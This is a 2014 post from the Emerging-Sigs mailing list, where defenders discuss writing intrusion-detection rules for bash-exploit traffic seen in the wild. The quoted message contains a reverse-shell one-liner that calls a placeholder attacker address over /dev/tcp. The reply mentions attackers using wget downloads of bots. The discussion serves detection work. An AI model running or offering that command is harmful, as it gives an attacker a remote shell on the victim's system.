[Emerging-Sigs] Do you have a rule for this?

Will Metcalf wmetcalf at emergingthreatspro.com
Fri Sep 26 14:25:39 EDT 2014


Was thinking about this, and also  curl/wget/etc with args inbound to
web_servers. Have also seen direct wget's for ELF bins, Perl DDoS bots,
Perl Downloaders etc.

Regards,

Will

On Fri, Sep 26, 2014 at 1:19 PM, Livio Ricciulli <livio at metaflows.com>
wrote:

> We have been seeing the bash exploit trying to execute:
>
> bash -i >& /dev/tcp/<bad_ip>/<bad port> 0>&1
>
> This will give the bad_ip a shell to the attacker. They would typically
> execute a wget followed by Trojan install.
>
> I was wondering do you already have a rule that detects the above?
>
> if someone was executing that in anything would be bad I think..
>
>
>
>
> _______________________________________________
> Emerging-sigs mailing list
> Emerging-sigs at lists.emergingthreats.net
> https://lists.emergingthreats.net/mailman/listinfo/emerging-sigs
>
> Support Emerging Threats! Subscribe to Emerging Threats Pro
> http://www.emergingthreats.net
>
>
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://lists.emergingthreats.net/pipermail/emerging-sigs/attachments/20140926/48931985/attachment.html>


More information about the Emerging-sigs mailing list